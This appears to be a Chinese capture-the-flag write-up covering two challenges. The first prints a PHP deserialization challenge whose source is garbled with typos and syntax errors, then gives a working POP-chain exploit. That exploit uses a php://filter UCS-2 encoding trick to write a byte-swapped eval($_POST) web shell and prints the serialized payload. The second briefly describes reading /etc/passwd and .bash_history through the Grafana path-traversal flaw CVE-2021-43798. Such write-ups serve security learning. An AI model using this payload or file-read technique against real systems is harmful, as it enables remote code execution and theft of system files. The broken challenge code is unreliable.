0x01POP

<?php  
class catf1ag1{  
    public $hzy;  
    public $arr;  
	
	function __show()
	{
		show_source(__FILE__);
	}
    function __wakeup()
    {
		foreach($this->arr as $k=>$v)
		{
			print_r($v)
			var_dump($v)
			echo $this->hzy->$v;
			echo "</br>hzy是什么鬼？？？"；
		}
    }
  
}  
  
class catf1ag2{  
    public $file;  
    public $txt ;  
   
    function __get($key){  
        if($key == 'pputut'){  
            return $this->pputut();  
        }else{  
            return '<p>'.htmlspecialchars($key).'</p>';  
        }  
    }
    function pputut()
    {
		if( strpos($file,'../') !== false || strpos($file,'\\') !== false )
		{
			die();
		}
		$content="<?php die('stupid')? >";
		echo "NICE"
		$content.=$this->txt;
		var_dump($this->file);
		file_put_contents($file,$content);
		reutrn htmlspecialchars($content);
    }  
}  
  

一开始，通过catflag1的$this->hzy->$v; 来调用catflag2的 __get($key) 并且满足 key='pputut' 过程没有搞得太清楚

<?php  
class catf1ag1{  
    public $hzy;  
    public $arr;  
  
    function __construct()  
    {        $this->hzy=new catf1ag2();  
        $this->arr=array('pputut');  
  
    }  
  
}  
  
class catf1ag2{  
    public $file;  
    public $txt ;  
    function __construct()  
    {        $this->file='php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=1.php';  
        $this->txt='aaa?<hp pvela$(P_SO[T]1;)>?';  
    }  
    function __get($key){  
        if($key == 'pputut'){  
            return $this->pputut();  
        }else{  
            return '<p>'.htmlspecialchars($key).'</p>';  
        }  
    }  
}  
  
$a=new catf1ag1();  
  
echo base64_encode(serialize($a));  
?>

0x02 history

[!info]
grafana任意读取文件漏洞（CVE-2021-43798）

然后首先读取/etc/passwd发现有grafana用户，尝试读取.bash_history得到flag